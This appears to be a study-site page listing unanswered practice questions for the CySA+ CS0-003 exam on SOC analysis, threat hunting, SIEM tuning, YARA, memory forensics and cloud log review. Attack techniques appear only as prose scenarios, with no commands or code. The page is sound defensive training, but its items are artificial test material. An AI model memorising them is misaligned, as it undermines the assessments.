An EDR alert shows that a process named svchost.exe with parent process cmd.exe executed a PowerShell command to create a scheduled task. The scheduled task runs a script from a remote share. What should the analyst suspect?

Question 140mediummultiple choice
Read the full Security Operations explanation →

A security team is configuring a vulnerability scanner for external scanning of their public-facing web applications. Which scan type will provide the most accurate assessment of vulnerabilities without requiring credentials?

Question 141mediummultiple choice
Read the full Security Operations explanation →

An analyst is tasked with creating a correlation rule in the SIEM to detect beaconing activity. Which log sources and fields are most relevant to model this behavior?

Question 142mediummultiple choice
Read the full Security Operations explanation →

During a threat hunting exercise, the hunter creates a hypothesis based on recent threat intelligence about a new ransomware variant that uses scheduled tasks for persistence. Which ATT&CK technique should the hunter focus on?

Question 143mediummultiple choice
Read the full Security Operations explanation →

A cloud security analyst is investigating an alert from AWS GuardDuty that indicates an EC2 instance is communicating with a known malicious IP address. The instance is part of an auto-scaling group. What is the best immediate action?

Question 144hardmultiple choice
Read the full Security Operations explanation →

An analyst is reviewing a packet capture and notices a TCP connection with the following sequence: SYN, SYN-ACK, ACK, SYN, ACK. What does this pattern indicate?

Question 145hardmultiple choice
Read the full Security Operations explanation →

A YARA rule is created to detect a specific malware family. The rule uses the string "MZ" at offset 0 and the string "malware" somewhere in the file. The analyst finds that many legitimate executables trigger the rule. What is the most effective way to reduce false positives?

Question 146hardmultiple choice
Read the full Security Operations explanation →

An analyst is investigating a memory dump of a compromised system and finds a process that appears to be running inside another process's memory space, with no associated executable on disk. Which technique best describes this finding?

Question 147easymultiple choice
Read the full Security Operations explanation →

A SIEM alert is generated for a user who logged into a workstation at 2:00 AM, which is outside their normal working hours. The user's manager confirms the user was on call and had legitimate reason to log in. How should the analyst classify this alert?

Question 148mediummulti select
Read the full Security Operations explanation →

An analyst is tuning a SIEM rule that triggers on failed logins. Which TWO modifications would most effectively reduce false positives without missing actual brute-force attacks? (Select TWO.)

Question 149hardmulti select
Read the full Security Operations explanation →

A security analyst is using osquery to hunt for persistence mechanisms on a Windows endpoint. Which THREE Windows artifacts should the analyst query to identify common persistence locations? (Select THREE.)

Question 150mediummulti select
Read the full Security Operations explanation →

An analyst is reviewing cloud audit logs from AWS CloudTrail and notices an API call to create an IAM user with administrative privileges from an IP address outside the corporate network. Which TWO actions should the analyst take first? (Select TWO.)

Question 151easymultiple choice
Read the full Security Operations explanation →

A security analyst is reviewing a SIEM alert that triggered on a known malicious IP address communicating with an internal server. The analyst checks the threat intelligence feed and confirms the IP is associated with a command-and-control server. What type of alert is this?

Question 152easymultiple choice
Read the full DNS explanation →

During a network traffic analysis, a security analyst notices a high volume of DNS queries to a domain that is algorithmically generated. The domain names follow a random pattern and are not resolved to known IP addresses. Which technique is most likely being used?

Question 153mediummultiple choice
Read the full Security Operations explanation →

A security analyst is investigating an alert from the EDR tool indicating that a process named 'powershell.exe' was launched with a parent process 'winword.exe'. The user's workstation had received a phishing email earlier that day. Which type of attack does this likely indicate?

Question 154hardmultiple choice
Read the full Security Operations explanation →

During a threat hunting engagement, an analyst creates a hypothesis based on a recent threat intelligence report about a new APT group using DLL side-loading for persistence. The analyst decides to search for processes that have loaded a known vulnerable DLL. Which framework is most appropriate to map the TTPs?

Question 155easymulti select
Read the full Security Operations explanation →

A security analyst is tuning a SIEM correlation rule that triggers on failed login attempts. The rule is generating a high number of alerts from a specific user who frequently mistypes passwords. The analyst wants to reduce false positives while maintaining detection of brute-force attacks. Which TWO actions should the analyst take?

Question 156easymulti select
Read the full Security Operations explanation →

A security analyst is performing a vulnerability scan on an internal network. The analyst wants to ensure the scanner can identify vulnerabilities in applications that require authentication. Which TWO scan configurations should be used?

Question 157mediummulti select
Read the full Security Operations explanation →

During a cloud security investigation, a security analyst notices unusual API calls from a compromised IAM user in AWS. The analyst wants to determine the scope of the breach and identify affected resources. Which TWO cloud-native services should the analyst use?

Question 158mediummulti select
Read the full network assurance explanation →

A threat hunter is reviewing endpoint telemetry and sees a process 'svchost.exe' spawning 'cmd.exe', which then executes 'reg.exe add' to create a Run key. The hunter suspects persistence. Which TWO artifacts should the hunter examine to confirm persistence?

Question 159mediummulti select
Read the full Security Operations explanation →

A security analyst is investigating a potential data exfiltration incident. Network traffic analysis shows large outbound data transfers to an external IP address on port 443. The analyst wants to determine if the data was encrypted. Which THREE tools or techniques should the analyst use?

Question 160mediummulti select
Read the full DNS explanation →

A SOC analyst is triaging a SIEM alert that indicates a possible DNS tunneling attack. The alert was generated based on a correlation rule that looks for unusually high DNS query volume from a single host. Which TWO additional data sources should the analyst correlate to confirm the attack?

Question 161mediummulti select
Read the full Security Operations explanation →

A security analyst is creating a YARA rule to detect a specific malware strain that uses a unique string in its code section and has a characteristic import table. The analyst wants to minimize false positives. Which THREE YARA rule elements should the analyst include?

Question 162hardmulti select
Read the full Security Operations explanation →

During a memory forensics investigation, a security analyst identifies a process that appears to have code injected into it. The process is 'explorer.exe' and its memory contains sections that are not part of the original executable. Which TWO memory analysis techniques should the analyst use to confirm code injection?

Question 163hardmulti select
Read the full Security Operations explanation →

A threat hunter is using Velociraptor to search for signs of lateral movement across multiple endpoints. The hunter wants to identify instances where a user logged into multiple systems using the same credentials within a short time frame. Which THREE artifacts should the hunter collect from each endpoint?

Question 164hardmulti select
Read the full Security Operations explanation →

A security analyst is reviewing an alert from Azure Sentinel that indicates a possible privilege escalation attempt. The alert is based on a correlation rule that detects unusual usage of the 'Add-AzKeyVaultKey' cmdlet by a user who has never used it before. The analyst needs to validate the alert and determine if the activity is malicious. Which THREE actions should the analyst take?

Question 165hardmulti select
Read the full Security Operations explanation →

A security analyst is analyzing a PCAP file from a network incident and notices a series of TCP connections with unusual flag combinations. Specifically, the SYN flag is set but the ACK flag is not set in the response, and the sequence numbers are not incrementing properly. The analyst suspects a TCP handshake manipulation. Which THREE TCP anomalies should the analyst document?

Practice tests

Scored 10-question sessions with instant feedback and explanations.

CS0-003 Practice Test 1 — 25 Questions→CS0-003 Practice Test 2 — 25 Questions→CS0-003 Practice Test 3 — 25 Questions→CS0-003 Practice Test 4 — 25 Questions→CS0-003 Practice Test 5 — 25 Questions→CS0-003 Practice Exam 1 — 20 Questions→CS0-003 Practice Exam 2 — 20 Questions→CS0-003 Practice Exam 3 — 20 Questions→CS0-003 Practice Exam 4 — 20 Questions→Free CS0-003 Practice Test 1 — 30 Questions→Free CS0-003 Practice Test 2 — 30 Questions→Free CS0-003 Practice Test 3 — 30 Questions→CS0-003 Practice Questions 1 — 50 Questions→CS0-003 Practice Questions 2 — 50 Questions→CS0-003 Exam Simulation 1 — 100 Questions→

Practice by domain

Each domain maps to a weighted exam section. Focus on the domain where you are weakest.

Security OperationsVulnerability ManagementIncident Response and ManagementReporting and Communication

Practice by scenario

Filter questions by type — troubleshooting, exhibit, drag-and-drop, PBQ, ACLs, OSPF, and more.

Browse scenarios→

Continue studying

All Security Operations setsAll Security Operations questionsCS0-003 Practice Hub